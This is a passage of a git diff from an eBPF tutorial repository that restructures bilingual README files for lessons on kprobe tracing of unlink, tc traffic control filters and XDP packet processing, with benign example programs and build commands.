kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/2-kprobe-unlink/README_en.md b/src/2-kprobe-unlink/README_en.md deleted file mode 100644 index 139aa5c..0000000 --- a/src/2-kprobe-unlink/README_en.md +++ /dev/null @@ -1,150 +0,0 @@ -# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. - -## Background of kprobes Technology - -During the debugging process of the kernel or modules, developers often need to know whether certain functions are called, when they are called, whether the execution is correct, and what the input and return values of the functions are. A simple approach is to add log print information to the corresponding functions in the kernel code. However, this approach often requires recompiling the kernel or modules, restarting the device, etc., which is complex and may disrupt the original code execution process. - -By using the kprobes technology, users can define their own callback functions and dynamically insert probes into almost all functions in the kernel or modules (some functions cannot be probed, such as the kprobes' own implementation functions, which will be explained in detail later). When the kernel execution flow reaches the specified probe function, it will invoke the callback function, allowing the user to collect the desired information. The kernel will then return to the normal execution flow. If the user has collected sufficient information and no longer needs to continue probing, the probes can be dynamically removed. Therefore, the kprobes technology has the advantages of minimal impact on the kernel execution flow and easy operation. - -The kprobes technology includes three detection methods: kprobe, jprobe, and kretprobe. First, kprobe is the most basic detection method and serves as the basis for the other two. It allows probes to be placed at any position (including within a function). It provides three callback modes for probes: `pre_handler`, `post_handler`, and `fault_handler`. The `pre_handler` function is called before the probed instruction is executed, the `post_handler` is called after the probed instruction is completed (note that it is not the probed function), and the `fault_handler` is called when a memory access error occurs. The jprobe is based on kprobe and is used to obtain the input values of the probed function. Finally, as the name suggests, kretprobe is also based on kprobe and is used to obtain the return values of the probed function. - -The kprobes technology is not only implemented through software but also requires support from the hardware architecture. This involves CPU exception handling and single-step debugging techniques. The former is used to make the program's execution flow enter the user-registered callback function, and the latter is used to single-step execute the probed instruction. Therefore, not all architectures support kprobes. Currently, kprobes technology supports various architectures, including i386, x86_64, ppc64, ia64, sparc64, arm, ppc, and mips (note that some architecture implementations may not be complete, see the kernel's Documentation/kprobes.txt for details). - -Features and Usage Restrictions of kprobes: - -1. kprobes allows multiple kprobes to be registered at the same probe position, but jprobe currently does not support this. It is also not allowed to use other jprobe callback functions or the `post_handler` callback function of kprobe as probe points. -2. In general, any function in the kernel can be probed, including interrupt handlers. However, the functions used to implement kprobes themselves in kernel/kprobes.c and arch/*/kernel/kprobes.c are not allowed to be probed. Additionally, `do_page_fault` and `notifier_call_chain` are also not allowed. -3. If an inline function is used as a probe point, kprobes may not be able to guarantee that probe points are registered for all instances of that function. Since gcc may automatically optimize certain functions as inline functions, the desired probing effect may not be achieved. -4. The callback function of a probe point may modify the runtime context of the probed function, such as by modifying the kernel's data structure or saving register information before triggering the prober in the `struct pt_regs` structure. Therefore, kprobes can be used to install bug fixes or inject fault testing code. -5. kprobes avoids calling the callback function of another probe point again when processing the probe point function. For example, if a probe point is registered on the `printk()` function and the callback function may call `printk()` again, the callback for the `printk` probe point will not be triggered again. Only the `nmissed` field in the `kprobe` structure will be incremented. -6. mutex locks and dynamic memory allocation are not used in the registration and removal process of kprobes. - -7. During the execution of kprobes callback functions, kernel preemption is disabled, and it may also be executed with interrupts disabled, which depends on the CPU architecture. Therefore, regardless of the situation, do not call functions that will give up the CPU in the callback function (such as semaphore, mutex lock, etc.); -8. kretprobe is implemented by replacing the return address with the pre-defined trampoline address, so stack backtraces and gcc inline function `__builtin_return_address()` will return the address of the trampoline instead of the actual return address of the probed function; -9. If the number of function calls and return calls of a function are unequal, registering kretprobe on such a function may not achieve the expected effect, for example, the `do_exit()` function will have problems, while the `do_execve()` function and `do_fork()` function will not; -10. When entering and exiting a function, if the CPU is running on a stack that does not belong to the current task, registering kretprobe on that function may have unpredictable consequences. Therefore, kprobes does not support registering kretprobe for the `__switch_to()` function under the X86_64 architecture and will directly return `-EINVAL`. - -## kprobe Example - -The complete code is as follows: - -```c -#include "vmlinux.h" -#include -#include -#include - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("kprobe/do_unlinkat") -int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) -{ - pid_t pid; - const char *filename; - - pid = bpf_get_current_pid_tgid() >> 32; - filename = BPF_CORE_READ(name, name); - bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); - return 0; -} - -SEC("kretprobe/do_unlinkat") -int BPF_KRETPROBE(do_unlinkat_exit, long ret) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); - return 0; -} -``` - -This code is a simple eBPF program used to monitor and capture the unlink system call executed in the Linux kernel. The unlink system call is used to delete a file. This eBPF program traces this system call by placing hooks at the entry and exit points of the `do_unlinkat` function using a kprobe (kernel probe). - -First, we import necessary header files such as vmlinux.h, bpf_helpers.h, bpf_tracing.h, and bpf_core_read.h. Then, we define a license to allow the program to run in the kernel. - -```c -#include "vmlinux.h" -#include -#include -#include - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -Next, we define a kprobe named `BPF_KPROBE(do_unlinkat)` which gets triggered when the `do_unlinkat` function is entered. It takes two parameters: `dfd` (file descriptor) and `name` (filename structure pointer). In this kprobe, we retrieve the PID (process identifier) of the current process and then read the filename. Finally, we use the `bpf_printk` function to print the PID and filename in the kernel log. - -```c -SEC("kprobe/do_unlinkat") -int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) -{ - pid_t pid; - const char *filename; - - pid = bpf_get_current_pid_tgid() >> 32; - filename = BPF_CORE_READ(name, name); - bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); - return 0; -} -``` - -Next, we define a kretprobe named `BPF_KRETPROBE(do_unlinkat_exit)` that will be triggered when exiting the `do_unlinkat` function. The purpose of this kretprobe is to capture the return value (`ret`) of the function. We again obtain the PID of the current process and use the `bpf_printk` function to print the PID and return value in the kernel log. - -```c -SEC("kretprobe/do_unlinkat") -int BPF_KRETPROBE(do_unlinkat_exit, long ret) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); - return 0; -} -``` - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its goal is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. - -To compile this program, use the ecc tool: - -```console -$ ecc kprobe-link.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Then run: - -```console -sudo ecli run package.json -``` - -In another window: - -```shell -touch test1 -rm test1 -touch test2 -rm test2 -``` - -You should see kprobe demo output similar to the following in the /sys/kernel/debug/tracing/trace_pipe file: - -```shell -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1 - rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: ret = 0 - rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2 - rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0 -``` - -## Summary - -In this article's example, we learned how to use eBPF's kprobe and kretprobe to capture the unlink system call. For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: - -This article is the second part of the introductory eBPF development tutorial. The next article will explain how to use fentry to monitor and capture the unlink system call in eBPF. - -If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/20-tc/README.md b/src/20-tc/README.md index 22d01ba..61afea2 100644 --- a/src/20-tc/README.md +++ b/src/20-tc/README.md @@ -1,18 +1,18 @@ -# eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 +# eBPF Tutorial by Example 20: tc Traffic Control -## 背景 +## Background -Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。 +Linux's Traffic Control (tc) subsystem has been present in the kernel for many years. Similar to the relationship between iptables and netfilter, tc includes a user-space tc program and a kernel-level traffic control framework. It is mainly used to control the sending and receiving of packets in terms of rate, sequence, and other aspects. Starting from Linux 4.1, tc has added some new attachment points and supports loading eBPF programs as filters onto these attachment points. -## tc 概述 +## Overview of tc -从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。 +From the protocol stack perspective, tc is located at the link layer. Its position has already completed the allocation of sk_buff and is later than xdp. In order to control the sending and receiving of packets, tc uses a queue structure to temporarily store and organize packets. In the tc subsystem, the corresponding data structure and algorithm control mechanism are abstracted as qdisc (Queueing discipline). It exposes two callback interfaces for enqueuing and dequeuing packets externally, and internally hides the implementation of queuing algorithms. In qdisc, we can implement complex tree structures based on filters and classes. Filters are mounted on qdisc or class to implement specific filtering logic, and the return value determines whether the packet belongs to a specific class. -当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。 +When a packet reaches the top-level qdisc, its enqueue interface is called, and the mounted filters are executed one by one until a filter matches successfully. Then the packet is sent to the class pointed to by that filter and enters the qdisc processing process configured by that class. The tc framework provides the so-called classifier-action mechanism, that is, when a packet matches a specific filter, the action mounted by that filter is executed to process the packet, implementing a complete packet classification and processing mechanism. -现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 `TC_ACT_OK` 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。 +The existing tc provides eBPF with the direct-action mode, which allows an eBPF program loaded as a filter to return values such as `TC_ACT_OK` as tc actions, instead of just returning a classid like traditional filters and handing over the packet processing to the action module. Now, eBPF programs can be mounted on specific qdiscs to perform packet classification and processing actions. -## 编写 eBPF 程序 +## Writing eBPF Programs ```c #include @@ -51,28 +51,28 @@ int tc_ingress(struct __sk_buff *ctx) char __license[] SEC("license") = "GPL"; ``` -这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Transmission Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。 +This code defines an eBPF program that can capture and process packets through Linux TC (Transmission Control). In this program, we limit it to capture only IPv4 protocol packets, and then print out the total length and Time-To-Live (TTL) value of the packet using the bpf_printk function. -需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释: +What needs to be noted is that we use some BPF library functions in the code, such as the functions bpf_htons and bpf_ntohs, which are used for conversion between network byte order and host byte order. In addition, we also use some comments to provide additional points and option information for TC. For example, at the beginning of this code, we use the following comments: ```c /// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} /// @tcopts {"handle":1, "priority":1} ``` -这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) 中的介绍。 +These comments tell TC to attach the eBPF program to the ingress attachment point of the network interface, and specify the values of the handle and priority options. You can refer to the introduction in [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) for tc-related APIs in libbpf. -总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。 +In summary, this code implements a simple eBPF program that captures packets and prints out their information. -## 编译运行 +## Compilation and Execution -通过容器编译: +Compile using a container: ```console docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或是通过 `ecc` 编译: +Or compile using `ecc`: ```console $ ecc tc.bpf.c @@ -80,13 +80,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -并通过 `ecli` 运行: +And run using `ecli`: ```shell sudo ecli run ./package.json ``` -可以通过如下方式查看程序的输出: +You can view the output of the program in the following way: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -96,13 +96,15 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64 ``` -## 总结 +## Summary -本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。 +This article introduces how to mount eBPF type filters to the TC traffic control subsystem to achieve queuing processing of link layer packets. Based on the solution provided by eunomia-bpf to pass parameters to libbpf through comments, we can mount our own tc BPF program to the target network device with specified options and use the sk_buff structure of the kernel to filter and process packets. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website for more examples and complete tutorials. -## 参考 +## References + + + +> The original link of this article: diff --git a/src/20-tc/README.zh.md b/src/20-tc/README.zh.md new file mode 100644 index 0000000..22d01ba --- /dev/null +++ b/src/20-tc/README.zh.md @@ -0,0 +1,108 @@ +# eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 + +## 背景 + +Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。 + +## tc 概述 + +从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。 + +当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。 + +现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 `TC_ACT_OK` 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。 + +## 编写 eBPF 程序 + +```c +#include +#include +#include +#include + +#define TC_ACT_OK 0 +#define ETH_P_IP 0x0800 /* Internet Protocol packet */ + +/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} +/// @tcopts {"handle":1, "priority":1} +SEC("tc") +int tc_ingress(struct __sk_buff *ctx) +{ + void *data_end = (void *)(__u64)ctx->data_end; + void *data = (void *)(__u64)ctx->data; + struct ethhdr *l2; + struct iphdr *l3; + + if (ctx->protocol != bpf_htons(ETH_P_IP)) + return TC_ACT_OK; + + l2 = data; + if ((void *)(l2 + 1) > data_end) + return TC_ACT_OK; + + l3 = (struct iphdr *)(l2 + 1); + if ((void *)(l3 + 1) > data_end) + return TC_ACT_OK; + + bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl); + return TC_ACT_OK; +} + +char __license[] SEC("license") = "GPL"; +``` + +这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Transmission Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。 + +需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释: + +```c +/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} +/// @tcopts {"handle":1, "priority":1} +``` + +这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) 中的介绍。 + +总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc tc.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +并通过 `ecli` 运行: + +```shell +sudo ecli run ./package.json +``` + +可以通过如下方式查看程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64 + sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64 + sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64 + node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64 +``` + +## 总结 + +本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + ++ ++ diff --git a/src/20-tc/README_en.md b/src/20-tc/README_en.md deleted file mode 100644 index 61afea2..0000000 --- a/src/20-tc/README_en.md +++ /dev/null @@ -1,110 +0,0 @@ -# eBPF Tutorial by Example 20: tc Traffic Control - -## Background - -Linux's Traffic Control (tc) subsystem has been present in the kernel for many years. Similar to the relationship between iptables and netfilter, tc includes a user-space tc program and a kernel-level traffic control framework. It is mainly used to control the sending and receiving of packets in terms of rate, sequence, and other aspects. Starting from Linux 4.1, tc has added some new attachment points and supports loading eBPF programs as filters onto these attachment points. - -## Overview of tc - -From the protocol stack perspective, tc is located at the link layer. Its position has already completed the allocation of sk_buff and is later than xdp. In order to control the sending and receiving of packets, tc uses a queue structure to temporarily store and organize packets. In the tc subsystem, the corresponding data structure and algorithm control mechanism are abstracted as qdisc (Queueing discipline). It exposes two callback interfaces for enqueuing and dequeuing packets externally, and internally hides the implementation of queuing algorithms. In qdisc, we can implement complex tree structures based on filters and classes. Filters are mounted on qdisc or class to implement specific filtering logic, and the return value determines whether the packet belongs to a specific class. - -When a packet reaches the top-level qdisc, its enqueue interface is called, and the mounted filters are executed one by one until a filter matches successfully. Then the packet is sent to the class pointed to by that filter and enters the qdisc processing process configured by that class. The tc framework provides the so-called classifier-action mechanism, that is, when a packet matches a specific filter, the action mounted by that filter is executed to process the packet, implementing a complete packet classification and processing mechanism. - -The existing tc provides eBPF with the direct-action mode, which allows an eBPF program loaded as a filter to return values such as `TC_ACT_OK` as tc actions, instead of just returning a classid like traditional filters and handing over the packet processing to the action module. Now, eBPF programs can be mounted on specific qdiscs to perform packet classification and processing actions. - -## Writing eBPF Programs - -```c -#include -#include -#include -#include - -#define TC_ACT_OK 0 -#define ETH_P_IP 0x0800 /* Internet Protocol packet */ - -/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} -/// @tcopts {"handle":1, "priority":1} -SEC("tc") -int tc_ingress(struct __sk_buff *ctx) -{ - void *data_end = (void *)(__u64)ctx->data_end; - void *data = (void *)(__u64)ctx->data; - struct ethhdr *l2; - struct iphdr *l3; - - if (ctx->protocol != bpf_htons(ETH_P_IP)) - return TC_ACT_OK; - - l2 = data; - if ((void *)(l2 + 1) > data_end) - return TC_ACT_OK; - - l3 = (struct iphdr *)(l2 + 1); - if ((void *)(l3 + 1) > data_end) - return TC_ACT_OK; - - bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl); - return TC_ACT_OK; -} - -char __license[] SEC("license") = "GPL"; -``` - -This code defines an eBPF program that can capture and process packets through Linux TC (Transmission Control). In this program, we limit it to capture only IPv4 protocol packets, and then print out the total length and Time-To-Live (TTL) value of the packet using the bpf_printk function. - -What needs to be noted is that we use some BPF library functions in the code, such as the functions bpf_htons and bpf_ntohs, which are used for conversion between network byte order and host byte order. In addition, we also use some comments to provide additional points and option information for TC. For example, at the beginning of this code, we use the following comments: - -```c -/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"} -/// @tcopts {"handle":1, "priority":1} -``` - -These comments tell TC to attach the eBPF program to the ingress attachment point of the network interface, and specify the values of the handle and priority options. You can refer to the introduction in [patchwork](https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/) for tc-related APIs in libbpf. - -In summary, this code implements a simple eBPF program that captures packets and prints out their information. - -## Compilation and Execution - -Compile using a container: - -```console -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile using `ecc`: - -```console -$ ecc tc.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -And run using `ecli`: - -```shell -sudo ecli run ./package.json -``` - -You can view the output of the program in the following way: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64 - sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64 - sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64 - node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64 -``` - -## Summary - -This article introduces how to mount eBPF type filters to the TC traffic control subsystem to achieve queuing processing of link layer packets. Based on the solution provided by eunomia-bpf to pass parameters to libbpf through comments, we can mount our own tc BPF program to the target network device with specified options and use the sk_buff structure of the kernel to filter and process packets. - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website for more examples and complete tutorials. - -## References - -+ -+ - -> The original link of this article: diff --git a/src/21-xdp/README.md b/src/21-xdp/README.md index d6269fa..ef6928c 100644 --- a/src/21-xdp/README.md +++ b/src/21-xdp/README.md @@ -1,78 +1,80 @@ -# eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 +# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP -在本教程中,我们将介绍 XDP(eXpress Data Path),并通过一个简单的例子帮助你入门。之后,我们将探讨更高级的 XDP 应用,例如负载均衡器、防火墙及其他实际应用。如果你对 eBPF 或 XDP 感兴趣,请在 [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) 上为我们点赞! +In this tutorial, we will introduce XDP (eXpress Data Path) and walk through a small example to help you get started. Later on, we will explore more advanced XDP applications, such as load balancers, firewalls, and other real-world use cases. Please give us a start on [Github](https://github.com/eunomia-bpf/bpf-developer-tutorial) if you are interested in eBPF or XDP! -## 什么是 XDP? +## What is XDP? -XDP 是 Linux 内核中的一种高性能可编程数据路径,专为网络接口级的数据包处理而设计。通过将 eBPF 程序直接附加到网络设备驱动程序上,XDP 能够在数据包到达内核网络栈之前拦截并处理它们。这使得 XDP 能够进行极低延迟和高效的数据包处理,非常适合如 DDoS 防护、负载均衡和流量过滤等任务。实际上,XDP 每核心的吞吐量可以高达 **每秒 2400 万包(Mpps)**。 +XDP is a high-performance, programmable data path in the Linux kernel, designed for packet processing at the network interface level. By attaching eBPF programs directly to network device drivers, XDP can intercept and handle packets before they reach the kernel’s networking stack. This allows for extremely low-latency and efficient packet processing, making it ideal for tasks like DDoS defense, load balancing, and traffic filtering. In fact, XDP can achieve throughput as high as **24 million packets per second (Mpps) per core**. -### 为什么选择 XDP? +### Why XDP? -XDP 运行在比传统 Linux 网络组件(如 cBPF)更低的层级,在网络设备驱动程序的软中断上下文中执行。它能够在数据包被内核标准网络栈处理之前对其进行处理,避免了创建 Linux 中表示网络数据包的 `skb_buff` 结构。这种早期处理为简单但频繁的操作(如丢弃恶意数据包或负载均衡服务器)带来了显著的性能提升。 +XDP operates at a lower level than traditional Linux networking components, like cBPF (Classic BPF), by running inside the soft interrupt context of the network device driver. It can handle packets before they are even processed by the kernel's standard networking stack, bypassing the creation of the `skb_buff` structure, which represents network packets in Linux. This early-stage processing provides significant performance gains for simple but frequent operations like dropping malicious packets or load balancing across servers. -与其他数据包处理机制相比,XDP 在性能和可用性之间取得了平衡,它利用了 Linux 内核的安全性和可靠性,同时通过可编程的 eBPF 提供了灵活性。 +Compared to other packet processing mechanisms, XDP strikes a balance between performance and usability, leveraging the security and reliability of the Linux kernel while providing flexibility through programmable eBPF. -## XDP 与其他方法的比较 +## Overview of XDP vs. Other Approaches -在 XDP 出现之前,一些解决方案通过完全绕过内核来加速数据包处理。其中一个显著的例子是 **DPDK**(数据平面开发工具包)。DPDK 允许用户空间应用程序直接控制网络设备,从而实现非常高的性能。然而,这种方法也存在一些权衡: +Before XDP, several other solutions aimed to accelerate packet processing by bypassing the kernel entirely. One prominent example is **DPDK** (Data Plane Development Kit). DPDK allows user-space applications to take direct control of network devices, achieving very high performance. However, this approach comes with trade-offs: -1. **缺乏内核集成**:DPDK 及其他内核绕过解决方案无法利用现有的内核网络功能,开发者必须在用户空间重新实现许多协议和功能。 +1. **Lack of Kernel Integration**: DPDK and other kernel-bypass solutions cannot utilize existing kernel networking features, requiring developers to reimplement many protocols and functions in user space. -2. **安全边界**:这些绕过技术破坏了内核的安全模型,使得难以利用内核提供的安全工具。 -3. **用户空间与内核的转换开销**:当用户空间数据包处理需要与传统内核网络交互时(例如基于套接字的应用程序),数据包必须重新注入到内核中,增加了开销和复杂性。 -4. **专用 CPU 使用**:为了处理高流量,DPDK 和类似解决方案通常需要专用的 CPU 核心来处理数据包,这限制了通用系统的可扩展性和效率。 +2. **Security Boundaries**: These bypass techniques break the kernel’s security model, making it harder to leverage security tools provided by the kernel. -另一个替代 XDP 的方法是使用 Linux 网络栈中的 **内核模块** 或 **挂钩**。虽然这种方法可以很好地集成现有的内核功能,但它需要大量的内核修改,且由于在数据包处理管道的后期运行,无法提供与 XDP 相同的性能优势。 +3. **User-Kernel Transition Costs**: When user-space packet processing needs to interact with traditional kernel networking (like socket-based applications), packets must be reinjected into the kernel, adding overhead and complexity. -### XDP + eBPF 的优势 +4. **Dedicated CPU Usage**: To handle high traffic, DPDK and similar solutions often require dedicating one or more CPU cores solely for packet processing, which limits the scalability and efficiency of general-purpose systems. -XDP 与 eBPF 结合提供了介于内核绕过方案(如 DPDK)和内核集成方案之间的中间地带。以下是 XDP + eBPF 脱颖而出的原因: +Another alternative to XDP is using **kernel modules** or **hooks** in the Linux networking stack. While this method integrates well with existing kernel features, it requires extensive kernel modifications and does not provide the same performance benefits, as it operates later in the packet processing pipeline. -- **高性能**:通过在网络接口卡(NIC)驱动程序级别拦截数据包,XDP 可以实现接近线速的性能,用于丢弃、重定向或负载均衡数据包,同时保持低资源消耗。 +### The XDP + eBPF Advantage + +XDP combined with eBPF offers a middle ground between kernel-bypass solutions like DPDK and kernel-integrated solutions. Here’s why XDP + eBPF stands out: + +- **High Performance**: By intercepting packets early at the NIC driver level, XDP achieves near-line rate performance for tasks like dropping, redirecting, or load balancing packets, all while keeping resource usage low. -- **内核集成**:与 DPDK 不同,XDP 在 Linux 内核中工作,允许与现有的内核网络栈和工具(如 `iptables`、`nftables` 或套接字)无缝交互。无需在用户空间重新实现网络协议。 +- **Kernel Integration**: Unlike DPDK, XDP works within the Linux 